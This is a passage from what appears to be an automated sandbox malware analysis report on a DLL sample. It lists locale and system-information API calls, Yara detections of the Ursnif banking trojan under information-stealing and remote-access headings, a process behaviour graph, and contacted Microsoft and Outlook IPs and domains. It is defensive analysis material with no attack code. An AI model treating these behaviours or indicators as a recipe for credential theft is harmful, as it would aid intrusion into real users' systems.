Source: loaddll32.exe, 00000000.00000002.496085670.0000000001330000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.497582493.0000000002E20000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A79135 cpuid 3_2_02A79135
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, 0_2_6DDFEC14
Source: C:\Windows\System32\loaddll32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 0_2_6DDF2C5A
Source: C:\Windows\System32\loaddll32.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 0_2_6DDFF468
Source: C:\Windows\System32\loaddll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 0_2_6DDFEF45
Source: C:\Windows\System32\loaddll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 0_2_6DDFEEC8
Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW, 0_2_6DDFEE88
Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW, 0_2_6DDF29A0
Source: C:\Windows\System32\loaddll32.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free, 0_2_6DDEE036
Source: C:\Windows\System32\loaddll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_6DDFAB64
Source: C:\Windows\System32\loaddll32.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_6DDFF2E7
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW, 0_2_6DDF2A26
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 3_2_6DDF2C5A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, 3_2_6DDFEC14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 3_2_6DDFD10F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 3_2_6DDFF468
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 3_2_6DDFEFC8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 3_2_6DDFEF45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 3_2_6DDFEEC8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 3_2_6DDFEE88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 3_2_6DDFF1BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 3_2_6DDF29A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free, 3_2_6DDEE036
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 3_2_6DDFF394
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 3_2_6DDFAB64
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 3_2_6DDFCB0D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_6DDFF2E7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 3_2_6DDF2A26
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC1ADA GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_6DDC1ADA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A79135 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 3_2_02A79135
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC1F0E CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_6DDC1F0E

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.451946137.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452051043.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.496928044.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445570350.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452023874.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452000205.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445487547.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445636875.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445602533.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445524931.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451869538.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452038744.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.498068878.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445456909.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451977445.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451921011.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445424230.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445650161.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 452, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 2248, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.451946137.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452051043.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.496928044.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445570350.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452023874.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452000205.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445487547.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445636875.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445602533.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445524931.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451869538.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452038744.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.498068878.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445456909.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451977445.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451921011.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445424230.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445650161.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 452, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 2248, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 445164 Sample: 5.dll Startdate: 07/07/2021 Architecture: WINDOWS Score: 84 40 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->40 42 Found malware configuration 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 2 other signatures 2->46 7 loaddll32.exe 1 2->7         started        10 iexplore.exe 1 53 2->10         started        process3 signatures4 48 Writes or reads registry keys via WMI 7->48 50 Writes registry values via WMI 7->50 12 rundll32.exe 7->12         started        15 cmd.exe 1 7->15         started        17 rundll32.exe 7->17         started        24 2 other processes 7->24 19 iexplore.exe 24 10->19         started        22 iexplore.exe 26 10->22         started        process5 dnsIp6 52 Writes registry values via WMI 12->52 26 rundll32.exe 15->26         started        28 HHN-efz.ms-acdc.office.com 40.101.137.98, 443, 49723, 49724 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 19->28 30 outlook.com 40.97.116.82, 443, 49720, 49721 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 19->30 36 5 other IPs or domains 19->36 32 52.97.144.2, 443, 49731, 49732 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 22->32 34 FRA-efz.ms-acdc.office.com 52.97.152.210, 443, 49729, 49730 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 22->34 38 4 other IPs or domains 22->38 signatures7 process8
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
40.101.137.98
 HHN-efz.ms-acdc.office.com United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
52.97.152.210
 FRA-efz.ms-acdc.office.com United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
52.97.144.2
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
52.97.233.2
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
40.97.116.82
 outlook.com United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false

Contacted Domains

Name IP Active
outlook.com 40.97.116.82 true
HHN-efz.ms-acdc.office.com 40.101.137.98 true
FRA-efz.ms-acdc.office.com 52.97.152.210 true
www.outlook.com unknown unknown
outlook.office365.com unknown unknown